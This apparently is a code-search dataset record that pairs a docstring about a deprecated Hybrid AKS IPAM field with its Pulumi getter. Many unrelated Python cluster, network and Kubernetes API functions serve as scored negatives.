"def get_cluster_entry(self):\n\n cert_data = self.cluster_description.get(\"certificateAuthority\", {}).get(\"data\", \"\")\n endpoint = self.cluster_description.get(\"endpoint\")\n arn = self.cluster_description.get(\"arn\")\n\n return OrderedDict([\n (\"cluster\", OrderedDict([\n (\"certificate-authority-data\", cert_data),\n (\"server\", endpoint)\n ])),\n (\"name\", arn)\n ])",
"def list_coe_clusters(self):\n return list(self.container_infrastructure_management.clusters())",
"def get_ids(self):\n all_networks = []\n network_dict = {}\n for network, status in self.networks.items():\n if status[\"onboarded\"]:\n all_networks.append(\"{}\".format(network))\n network_dict[status[\"name\"]] = network\n\n self.network_ids = all_networks\n return network_dict",
"def get_cluster_id(self):\n cmd = \"svcinfo lscluster -delim :\"\n\n output = self._svc_command(cmd)[0]\n\n if len(output) != 2:\n return None\n\n header = output[0].split(':')\n values = output[1].split(':')\n index = header.index(SVC_CLUSTER_ID)\n cluster_id = values[index]\n return cluster_id",
"def get_node_ids(self):\n \n return self.node_ids",
"def build_resource_labels(self):\n response = [ \n {\n \"key\": \"instance_id\", \n \"value\": \"9113659852587170607\"\n }, \n {\n \"key\": \"project_id\", \n \"value\": \"YOUR_PROJECT_ID\"\n }, \n {\n \"key\": \"zone\", \n \"value\": \"us-east4-a\"\n }\n ]\n return response",
"def cluster_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_id\")",
"def test_get_hyperflex_cluster_network_policy_list(self):\n pass",
"def test_get_hyperflex_cluster_list(self):\n pass",
"def listClusters():\n return [c['name'] for c in pymongo.Connection().clovr.clusters.find()]",
"def tags(self):\n return ['HostRoles/component_name', \\\n 'HostRoles/host_name', \\\n 'HostRoles/cluster_name']",
"def test_list_cluster_role(self):\n pass",
"def list_namespaced_cluster_role(self, **kwargs):\n\n all_params = ['pretty', 'label_selector', 'field_selector', 'watch', 'resource_version', 'timeout_seconds']\n all_params.append('callback')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method list_namespaced_cluster_role\" % key\n )\n params[key] = val\n del params['kwargs']\n\n\n resource_path = '/oapi/v1/clusterroles'.replace('{format}', 'json')\n path_params = {}\n\n query_params = {}\n if 'pretty' in params:\n query_params['pretty'] = params['pretty']\n if 'label_selector' in params:\n query_params['labelSelector'] = params['label_selector']\n if 'field_selector' in params:\n query_params['fieldSelector'] = params['field_selector']\n if 'watch' in params:\n query_params['watch'] = params['watch']\n if 'resource_version' in params:\n query_params['resourceVersion'] = params['resource_version']\n if 'timeout_seconds' in params:\n query_params['timeoutSeconds'] = params['timeout_seconds']\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json', 'application/yaml'])\n if not header_params['Accept']:\n del header_params['Accept']\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.\\\n select_header_content_type(['*/*'])\n\n # Authentication setting\n auth_settings = []\n\n response = self.api_client.call_api(resource_path, 'GET',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='V1ClusterRoleList',\n auth_settings=auth_settings,\n callback=params.get('callback'))\n return response",
"def list_ecs_clusters():\n clusters = ECS_MANAGER.list_ecs_clusters()\n\n print(str_sep)\n\n if clusters:\n print(\"Listing clusters ARNs available in {}\"\n .format(SESSION.region_name.upper()))\n print(str_sep)\n for arn in clusters['clusterArns']:\n print(arn)\n\n print(str_sep)",
"def cluster_nodes(self) -> ResponseT:\n return self.execute_command(\"CLUSTER NODES\")",
"def known_nodes(self) -> List[Client]:\n return list(self.in_memory_client_registry.values())",
"def watch_namespaced_cluster_network_list(self, **kwargs):\n\n all_params = ['pretty', 'label_selector', 'field_selector', 'watch', 'resource_version', 'timeout_seconds']\n all_params.append('callback')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method watch_namespaced_cluster_network_list\" % key\n )\n params[key] = val\n del params['kwargs']\n\n\n resource_path = '/oapi/v1/watch/clusternetworks'.replace('{format}', 'json')\n path_params = {}\n\n query_params = {}\n if 'pretty' in params:\n query_params['pretty'] = params['pretty']\n if 'label_selector' in params:\n query_params['labelSelector'] = params['label_selector']\n if 'field_selector' in params:\n query_params['fieldSelector'] = params['field_selector']\n if 'watch' in params:\n query_params['watch'] = params['watch']\n if 'resource_version' in params:\n query_params['resourceVersion'] = params['resource_version']\n if 'timeout_seconds' in params:\n query_params['timeoutSeconds'] = params['timeout_seconds']\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json'])\n if not header_params['Accept']:\n del header_params['Accept']\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.\\\n select_header_content_type(['*/*'])\n\n # Authentication setting\n auth_settings = []\n\n response = self.api_client.call_api(resource_path, 'GET',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='JsonWatchEvent',\n auth_settings=auth_settings,\n callback=params.get('callback'))\n return response",
"def network_acls(self) -> Optional['outputs.DataCollectionEndpointResponseNetworkAcls']:\n return pulumi.get(self, \"network_acls\")",
"def list_clusters(_filter=None):\n ecs_clusters = __paginate_call(ecs_client, 'list_clusters', 'clusterArns')\n if _filter:\n ecs_clusters = [cluster for cluster in ecs_clusters if _filter in cluster]\n return sorted(ecs_clusters)",
"def get_cluster_elements_labels(self):\n \n copy = deepcopy(self.cluster_elements_labels)\n return copy",
"def cluster_types(self):\n raise NotImplementedError",
"def get_cluster_elements_str(self):\n\n copy = deepcopy(self.cluster_elements_str)\n return copy",
"def cluster(self):\n return self._cluster",
"def cluster(self):\n return self._cluster",
"def get_nids(self, nodes):\n nids = []\n\n for node in nodes.values():\n try:\n hostname = Conf.get(self._index, f'cluster>{node}>hostname')\n except:\n raise MotrError(errno.EINVAL, f\"{node} hostname not found\")\n\n check_type(hostname, str, \"hostname\")\n\n if self._server_id == node:\n cmd = \"lctl list_nids\"\n else:\n cmd = (f\"ssh -o \\\"StrictHostKeyChecking=no\\\" {hostname}\"\n \" lctl list_nids\")\n op = execute_command(self, cmd)\n nids.append(op[0].rstrip(\"\\n\"))\n\n return nids",
"def identifiers(self) -> List[str]:\n raise NotImplementedError",
"def list_clusters(ctx, project_name):\n project = ctx.obj.groups.byName[project_name].get().data\n clusters = ctx.obj.groups[project.id].clusters.get()\n pprint(clusters.data)",
"def get_ids(self) -> List[str]:",
"def resource_labels(self) -> Mapping[str, str]:\n return pulumi.get(self, \"resource_labels\")",
"def cloud_ids(self):\n if self.stage == 'trainval':\n ids = self.all_cloud_ids['train'] + self.all_cloud_ids['val']\n else:\n ids = self.all_cloud_ids[self.stage]\n return sorted(list(set(ids)))",
"def ListAnnotationsForCluster(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')",
"def subnet_ids(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"subnet_ids\")",
"def subnet_ids(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"subnet_ids\")",
"def subnet_ids(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"subnet_ids\")",
"def __str__(self):\n return \"Cluster\"",
"def security_ip_lists(self) -> pulumi.Output[Sequence[str]]:\n warnings.warn(\"\"\"Field 'security_ip_list' has been deprecated from version 1.187.0. Use 'ip_whitelist' instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"security_ip_lists is deprecated: Field 'security_ip_list' has been deprecated from version 1.187.0. Use 'ip_whitelist' instead.\"\"\")\n\n return pulumi.get(self, \"security_ip_lists\")",
"def get_refresh_ids(self):\n ids = []\n for bucket in self.router.lonely_buckets():\n rid = random.randint(*bucket.range).to_bytes(20, byteorder='big')\n ids.append(rid)\n return ids",
"def security_ip_lists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n warnings.warn(\"\"\"Field 'security_ip_list' has been deprecated from version 1.187.0. Use 'ip_whitelist' instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"security_ip_lists is deprecated: Field 'security_ip_list' has been deprecated from version 1.187.0. Use 'ip_whitelist' instead.\"\"\")\n\n return pulumi.get(self, \"security_ip_lists\")",
"def security_ip_lists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n warnings.warn(\"\"\"Field 'security_ip_list' has been deprecated from version 1.187.0. Use 'ip_whitelist' instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"security_ip_lists is deprecated: Field 'security_ip_list' has been deprecated from version 1.187.0. Use 'ip_whitelist' instead.\"\"\")\n\n return pulumi.get(self, \"security_ip_lists\")",
"def security_group_ids(self) -> Optional[Sequence[str]]:\n return pulumi.get(self, \"security_group_ids\")",
"def get_clusters():\n return objects.ClusterCollection.order_by(\n objects.ClusterCollection.all(),\n 'id'\n )",
"def subnet_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"subnet_ids\")",
"def subnet_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"subnet_ids\")",
"def subnet_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"subnet_ids\")",
"def clusters(self) -> Iterable[dto.Cluster]:\n raise errors.UnsupportedOperationError(\n \"Operation not supported for provider '{}'\".format(self.provider_name)\n )",
"def link_ids(self):\n return self._link_ids",
"def __repr__(self):\n\n return \"<Cluster id=%s>\" % (self.id)",
"def core_network_arn(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"core_network_arn\")",
"def netlist(self):\n return self._netlist",
"def clusters(self) -> ndarray:\n return self._clusters",
"def resource_names(self):\n return self._resource_names",
"def subnet_ids(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:\n return pulumi.get(self, \"subnet_ids\")",
"def subnet_ids(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:\n return pulumi.get(self, \"subnet_ids\")"
] | [
"0.68748236",
"0.6741056",
"0.6469224",
"0.58448756",
"0.5693075",
"0.5632907",
"0.56074035",
"0.56074035",
"0.56074035",
"0.56074035",
"0.56074035",
"0.5602489",
"0.55777043",
"0.55605936",
"0.5555327",
"0.55306417",
"0.55130476",
"0.55130476",
"0.55060947",
"0.5469506",
"0.54570967",
"0.544265",
"0.5441059",
"0.5417788",
"0.54071575",
"0.53971267",
"0.53602755",
"0.53188676",
"0.5297521",
"0.52798057",
"0.52638596",
"0.52589864",
"0.5250788",
"0.523533",
"0.52321106",
"0.52301383",
"0.5225441",
"0.5225441",
"0.5225441",
"0.5225441",
"0.5219824",
"0.5214521",
"0.5214521",
"0.51926345",
"0.51856536",
"0.51830727",
"0.5164489",
"0.5152405",
"0.51510185",
"0.5145161",
"0.5143226",
"0.5143226",
"0.5143226",
"0.5134375",
"0.51310194",
"0.5126028",
"0.5104401",
"0.50728184",
"0.50644374",
"0.50544655",
"0.5050569",
"0.50429744",
"0.5034171",
"0.50188214",
"0.50150734",
"0.5014696",
"0.5011176",
"0.5006724",
"0.5006229",
"0.5006229",
"0.50021666",
"0.4994703",
"0.49934614",
"0.49908924",
"0.49769872",
"0.49680382",
"0.49600264",
"0.4957831",
"0.4957831",
"0.4957831",
"0.49561772",
"0.4954215",
"0.49499175",
"0.49423066",
"0.49423066",
"0.49261513",
"0.49246362",
"0.4917164",
"0.4917164",
"0.4917164",
"0.49147078",
"0.49115527",
"0.49083775",
"0.4906985",
"0.49034274",
"0.49008778",
"0.49006087",
"0.48998994",
"0.48998994"
] | 0.5681043 | 6 |
Field Deprecated. The field was previously optional, now it will have no defined behavior and will be ignored. The indicator of whether or not to disable IPAM allocation on the network attachment definition injected into the Hybrid AKS Cluster. | def hybrid_aks_ipam_enabled(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "hybrid_aks_ipam_enabled") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def internet_advertising_disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"internet_advertising_disabled\")",
"def internet_advertising_disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"internet_advertising_disabled\")",
"def ipam_enabled(self) -> Optional[pulumi.Input[Union[str, 'L3NetworkConfigurationIpamEnabled']]]:\n return pulumi.get(self, \"ipam_enabled\")",
"def internet_advertising_disabled(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"internet_advertising_disabled\")",
"def AddNetworkFlag(parser):\n help_text = \"\"\"\\\n The VPC network from which the AlloyDB instance is accessible via private\n IP. For example, projects/myProject/global/networks/default. This setting\n cannot be updated after it is set.\n \"\"\"\n parser.add_argument('--network', help=help_text)",
"def allowNoneIngressLabel(self):\n return self.isAllowedIngressLabel(None)",
"def allowNoneIngressLabel(self):\n return self.isAllowedIngressLabel(None)",
"def allow_v_net_override(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_v_net_override\")",
"def allowNoIngressLabel(self):\n if self.layer != None:\n return self.layer.allowNoIngressLabel()\n return False # no layer means no restrictions",
"def publicly_advertisable(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"publicly_advertisable\")",
"def publicly_advertisable(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"publicly_advertisable\")",
"def __init__(__self__, *,\n disable_outbound_nat: Optional[pulumi.Input[bool]] = None):\n if disable_outbound_nat is not None:\n pulumi.set(__self__, \"disable_outbound_nat\", disable_outbound_nat)",
"def setDefaultCapability(self, b):\n self.defaultAllow = b",
"def allow_v_net_override(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"allow_v_net_override\")",
"def __init__(__self__, *,\n enabled: Optional[pulumi.Input[bool]] = None,\n ipv4_cidr_block: Optional[pulumi.Input[str]] = None,\n use_service_networking: Optional[pulumi.Input[bool]] = None):\n if enabled is not None:\n pulumi.set(__self__, \"enabled\", enabled)\n if ipv4_cidr_block is not None:\n pulumi.set(__self__, \"ipv4_cidr_block\", ipv4_cidr_block)\n if use_service_networking is not None:\n pulumi.set(__self__, \"use_service_networking\", use_service_networking)",
"def nfc_beam_disabled(self):\n return self._nfc_beam_disabled",
"def disable_outbound_nat(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disable_outbound_nat\")",
"def setAllowAnnotations(self,value):\n self.PDFreactorConfiguration.in1[\"allowAnnotations\"] = value",
"def disable_openapi_validation(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disable_openapi_validation\")",
"def privacy_protocol_not(self, privacy_protocol_not):\n\n self._privacy_protocol_not = privacy_protocol_not",
"def disable_bgp_route_propagation(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disable_bgp_route_propagation\")",
"def disable_bgp_route_propagation(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disable_bgp_route_propagation\")",
"def allowNoIngressLabel(self):\n if (self.ingresslabels != None):\n return self.ingresslabels.isempty()\n elif self.layer != None:\n return self.layer.allowNoIngressLabel()\n return False # no layer means no restrictions",
"def _get_lsp_config_ospf_ignore_metric(self):\n return self.__lsp_config_ospf_ignore_metric",
"def public_access_behind_virtual_network_enabled(self) -> Optional[pulumi.Input[bool]]:\n warnings.warn(\"\"\"`public_access_behind_virtual_network_enabled` will be removed in favour of the property `public_network_access_enabled` in version 4.0 of the AzureRM Provider.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"public_access_behind_virtual_network_enabled is deprecated: `public_access_behind_virtual_network_enabled` will be removed in favour of the property `public_network_access_enabled` in version 4.0 of the AzureRM Provider.\"\"\")\n\n return pulumi.get(self, \"public_access_behind_virtual_network_enabled\")",
"def public_access_behind_virtual_network_enabled(self) -> Optional[pulumi.Input[bool]]:\n warnings.warn(\"\"\"`public_access_behind_virtual_network_enabled` will be removed in favour of the property `public_network_access_enabled` in version 4.0 of the AzureRM Provider.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"public_access_behind_virtual_network_enabled is deprecated: `public_access_behind_virtual_network_enabled` will be removed in favour of the property `public_network_access_enabled` in version 4.0 of the AzureRM Provider.\"\"\")\n\n return pulumi.get(self, \"public_access_behind_virtual_network_enabled\")",
"def enable_network_egress_metering(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"enable_network_egress_metering\")",
"def attached_network_configuration(self) -> Optional[pulumi.Input['AttachedNetworkConfigurationArgs']]:\n return pulumi.get(self, \"attached_network_configuration\")",
"def attached_network_configuration(self) -> Optional[pulumi.Input['AttachedNetworkConfigurationArgs']]:\n return pulumi.get(self, \"attached_network_configuration\")",
"def Ipv4Flag(self):\r\n\t\treturn self._get_attribute('ipv4Flag')",
"def gateway_disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"gateway_disabled\")",
"def gateway_disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"gateway_disabled\")",
"def reason_to_be_disabled(cls):\n # Assume by default the given decoder is always enabled.\n return None",
"def client_ip_preservation_enabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"client_ip_preservation_enabled\")",
"def pre_network_ipam_create(self, resource_dict):\n pass",
"def disable_openapi_validation(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"disable_openapi_validation\")",
"def is_disable_apic(self):\n\t\treturn bool(call_sdk_function('PrlVmCfg_IsDisableAPIC', self.handle))",
"def deny(ip):\n return __apf_cmd(\"-d {}\".format(ip))",
"def disable():\n if _status_apf():\n return __apf_cmd(\"-f\")",
"def enabled(self) -> Optional[pulumi.Input[bool]]:\n warnings.warn(\"\"\"This field is deprecated. Leave this unset and instead configure BinaryAuthorization using evaluation_mode. If evaluation_mode is set to anything other than EVALUATION_MODE_UNSPECIFIED, this field is ignored.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"enabled is deprecated: This field is deprecated. Leave this unset and instead configure BinaryAuthorization using evaluation_mode. If evaluation_mode is set to anything other than EVALUATION_MODE_UNSPECIFIED, this field is ignored.\"\"\")\n\n return pulumi.get(self, \"enabled\")",
"def only_use_host_ips(self) -> Optional[pulumi.Input[Union[str, 'BfdEnabled']]]:\n return pulumi.get(self, \"only_use_host_ips\")",
"def disable_probe(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disable_probe\")",
"def disable_suppress_accessibility_service(self) -> Optional[bool]:\n return self.get_capability(DISABLE_SUPPRESS_ACCESSIBILITY_SERVICE)",
"def network_config(self) -> Optional[pulumi.Input['PrivateCloudNetworkConfigArgs']]:\n return pulumi.get(self, \"network_config\")",
"def get_disable_vpa(self) -> bool:\n return self._get_disable_vpa(enable_validation=True)",
"def accelerated_network(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"accelerated_network\")",
"def require_privmsg():\n def add_attribute(func):\n if not hasattr(func, \"priv_msg\"):\n func.priv_msg = True\n return func\n return add_attribute",
"def publicly_advertisable(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"publicly_advertisable\")",
"def enable_node_autoprovisioning(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"enable_node_autoprovisioning\")",
"def disable_bgp_route_propagation(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"disable_bgp_route_propagation\")",
"def disability_specify(self, instance):\r\n return instance.user.profile.disability_specify",
"def ipv4_enabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"ipv4_enabled\")",
"def disabled_by_microsoft(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"disabled_by_microsoft\")",
"def unclean_leader_election_enable(self) -> Optional[pulumi.Input[bool]]:\n warnings.warn(\"\"\"This field is deprecated and no longer functional.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"unclean_leader_election_enable is deprecated: This field is deprecated and no longer functional.\"\"\")\n\n return pulumi.get(self, \"unclean_leader_election_enable\")",
"def disable_probe(self) -> pulumi.Input[bool]:\n return pulumi.get(self, \"disable_probe\")",
"def enable_private_endpoint(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"enable_private_endpoint\")",
"def enable_private_nodes(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"enable_private_nodes\")",
"def enable_private_nodes(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"enable_private_nodes\")",
"def isNoModifiable(self):\n return self.f4 is '-'",
"def allow_ip_sans(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_ip_sans\")",
"def allow_ip_sans(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_ip_sans\")",
"def is_no_storage_enabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"is_no_storage_enabled\")",
"def is_no_storage_enabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"is_no_storage_enabled\")",
"def fix_has_no_advisory(self):\n fixed_in = self.fixed_artifact()\n return fixed_in and fixed_in.vendor_no_advisory",
"def post_network_ipam_create(self, resource_dict):\n pass",
"def allow_virtual_network_access(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_virtual_network_access\")",
"def allow_virtual_network_access(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_virtual_network_access\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def use_service_networking(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"use_service_networking\")",
"def pre_network_ipam_update(self, resource_id, resource_dict):\n pass",
"def nfc_beam_disabled(self, nfc_beam_disabled):\n\n self._nfc_beam_disabled = nfc_beam_disabled",
"def auto_assign(self) -> Optional[pulumi.Input[Union[str, 'BfdEnabled']]]:\n return pulumi.get(self, \"auto_assign\")",
"def add_annotation_to_placement(self):\n\n config.switch_acm_ctx()\n placcement_obj = ocp.OCP(\n kind=constants.PLACEMENT_KIND,\n resource_name=self.appset_placement_name,\n namespace=\"openshift-gitops\",\n )\n placcement_obj.annotate(\n annotation=\"cluster.open-cluster-management.io/experimental-scheduling-disable='true'\"\n )",
"def check_disabled(self):\n return None",
"def public_access_behind_virtual_network_enabled(self) -> pulumi.Output[Optional[bool]]:\n warnings.warn(\"\"\"`public_access_behind_virtual_network_enabled` will be removed in favour of the property `public_network_access_enabled` in version 4.0 of the AzureRM Provider.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"public_access_behind_virtual_network_enabled is deprecated: `public_access_behind_virtual_network_enabled` will be removed in favour of the property `public_network_access_enabled` in version 4.0 of the AzureRM Provider.\"\"\")\n\n return pulumi.get(self, \"public_access_behind_virtual_network_enabled\")",
"def privileged(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"privileged\")",
"def privileged(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"privileged\")",
"def __init__(__self__, *,\n enable_integrity_monitoring: Optional[pulumi.Input[bool]] = None,\n enable_secure_boot: Optional[pulumi.Input[bool]] = None):\n if enable_integrity_monitoring is not None:\n pulumi.set(__self__, \"enable_integrity_monitoring\", enable_integrity_monitoring)\n if enable_secure_boot is not None:\n pulumi.set(__self__, \"enable_secure_boot\", enable_secure_boot)",
"def email_protection_flag(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"email_protection_flag\")",
"def email_protection_flag(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"email_protection_flag\")",
"def enable(self):\n return self._packet.get('enable', False)\n\n # TODO: TCONT and GEM lists",
"def __init__(__self__, *,\n disable: Optional[pulumi.Input[bool]] = None):\n if disable is not None:\n pulumi.set(__self__, \"disable\", disable)",
"def core_network_attachment_arn(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"core_network_attachment_arn\")",
"def skip_metric_validation(self) -> Optional[bool]:\n return pulumi.get(self, \"skip_metric_validation\")",
"def skip_metric_validation(self) -> Optional[bool]:\n return pulumi.get(self, \"skip_metric_validation\")",
"def gateway_disabled(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"gateway_disabled\")",
"def is_ap(self, obj):\n return hasattr(obj, 'attachment_point_info')",
"def policy_net(self) -> bool:\n raise NotImplementedError()",
"def _disallow_public_access(self) -> typing.Optional[bool]:\n return jsii.get(self, \"disallowPublicAccess\")",
"def __init__(__self__, *,\n enabled: Optional[pulumi.Input[bool]] = None,\n evaluation_mode: Optional[pulumi.Input['BinaryAuthorizationEvaluationMode']] = None):\n if enabled is not None:\n warnings.warn(\"\"\"This field is deprecated. Leave this unset and instead configure BinaryAuthorization using evaluation_mode. If evaluation_mode is set to anything other than EVALUATION_MODE_UNSPECIFIED, this field is ignored.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"enabled is deprecated: This field is deprecated. Leave this unset and instead configure BinaryAuthorization using evaluation_mode. If evaluation_mode is set to anything other than EVALUATION_MODE_UNSPECIFIED, this field is ignored.\"\"\")\n if enabled is not None:\n pulumi.set(__self__, \"enabled\", enabled)\n if evaluation_mode is not None:\n pulumi.set(__self__, \"evaluation_mode\", evaluation_mode)"
] | [
"0.60128003",
"0.60128003",
"0.57295716",
"0.56930447",
"0.5477912",
"0.5282392",
"0.5282392",
"0.52573335",
"0.5233392",
"0.5205244",
"0.5205244",
"0.5186832",
"0.5175805",
"0.5155281",
"0.51379627",
"0.51135457",
"0.5112992",
"0.51077884",
"0.50872314",
"0.5076411",
"0.50372726",
"0.50372726",
"0.50290173",
"0.4988413",
"0.4983122",
"0.4983122",
"0.49744266",
"0.49512318",
"0.49512318",
"0.49341083",
"0.49175653",
"0.49175653",
"0.4891726",
"0.48868865",
"0.48716608",
"0.4866823",
"0.48616725",
"0.4857399",
"0.48471162",
"0.48411426",
"0.4838005",
"0.48259526",
"0.4819597",
"0.48186466",
"0.47999376",
"0.47987777",
"0.47867328",
"0.47761276",
"0.47756547",
"0.4763553",
"0.47488573",
"0.47449958",
"0.47408843",
"0.47324088",
"0.4729748",
"0.47279128",
"0.47249806",
"0.47249806",
"0.47102675",
"0.47096336",
"0.47096336",
"0.47058025",
"0.47058025",
"0.47036517",
"0.46981844",
"0.46973774",
"0.46973774",
"0.46915522",
"0.46915522",
"0.46915522",
"0.46915522",
"0.46915522",
"0.46915522",
"0.46915522",
"0.46915522",
"0.46915522",
"0.46915522",
"0.46915522",
"0.46915522",
"0.46822202",
"0.4679528",
"0.46665454",
"0.4666193",
"0.4662276",
"0.46464175",
"0.46439588",
"0.4635157",
"0.4635157",
"0.46347418",
"0.46323135",
"0.46323135",
"0.46314365",
"0.46280137",
"0.46268943",
"0.4623446",
"0.4623446",
"0.46122238",
"0.46066305",
"0.46018344",
"0.45978975",
"0.45971766"
] | 0.0 | -1 |
Field Deprecated. The field was previously optional, now it will have no defined behavior and will be ignored. The network plugin type for Hybrid AKS. | def hybrid_aks_plugin_type(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "hybrid_aks_plugin_type") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def network_plugin(self) -> Optional[pulumi.Input[Union[str, 'NetworkPlugin']]]:\n return pulumi.get(self, \"network_plugin\")",
"def network_plugin_mode(self) -> Optional[pulumi.Input[Union[str, 'NetworkPluginMode']]]:\n return pulumi.get(self, \"network_plugin_mode\")",
"def get_network_plugin(self) -> Union[str, None]:\n\n return self._get_network_plugin(enable_validation=True)",
"def get_network_plugin_mode(self) -> Union[str, None]:\n return self._get_network_plugin_mode(enable_validation=True)",
